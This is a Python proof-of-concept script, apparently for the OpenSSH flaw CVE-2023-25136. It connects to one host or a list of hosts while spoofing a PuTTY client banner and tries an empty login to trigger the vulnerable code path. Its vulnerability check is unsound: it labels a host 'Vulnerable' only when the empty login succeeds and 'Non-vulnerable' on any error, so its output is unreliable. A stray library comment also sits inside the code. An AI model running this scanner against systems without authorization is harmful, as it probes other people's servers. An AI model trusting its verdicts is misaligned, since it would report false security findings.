CVE-2023-25136.py

import paramiko
import socket
from termcolor import colored
import argparse

class SSHVulnerabilityChecker:
    def __init__(self, client_id):
        self.client_id = client_id

    def check_vulnerability(self, ip):
        try:
# Consider using a socket object with a timeout value as the `sock` argument for `connect()` instead of passing a `timeout` argument directly. See the note in the `Transport` class for more information.
            transport = paramiko.Transport(ip)
            transport.sock.settimeout(1)
            transport.local_version = f"SSH-2.0-{self.client_id}"
            transport.connect(username='', password='')
            print(colored(f"{ip}: Vulnerable", 'green'))
            transport.close()
        except (socket.error, paramiko.AuthenticationException, paramiko.SSHException):
            print(colored(f"{ip}: Non-vulnerable", 'red'))

if __name__ == '__main__':
    print("*************************************************")
    print("*                                               *")
    print("*     POC of CVE-2023-25136 by adhkr            *")
    print("*                                               *")
    print("*************************************************")

    parser = argparse.ArgumentParser(description='Check SSH vulnerability on one or multiple IP addresses.')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-i', '--ip', metavar='IP_ADDRESS', help='IP address to test for vulnerability.')
    group.add_argument('-f', '--file', metavar='FILE_NAME', help='File name containing a list of IP addresses to test for vulnerability.')
    args = parser.parse_args()

    client_id = "PuTTY_Release_0.64"
    checker = SSHVulnerabilityChecker(client_id)

    if args.ip:
        checker.check_vulnerability(args.ip)
    else:
        file_name = args.file
        with open(file_name, 'r') as f:
            for line in f:
                ip = line.strip()
                checker.check_vulnerability(ip)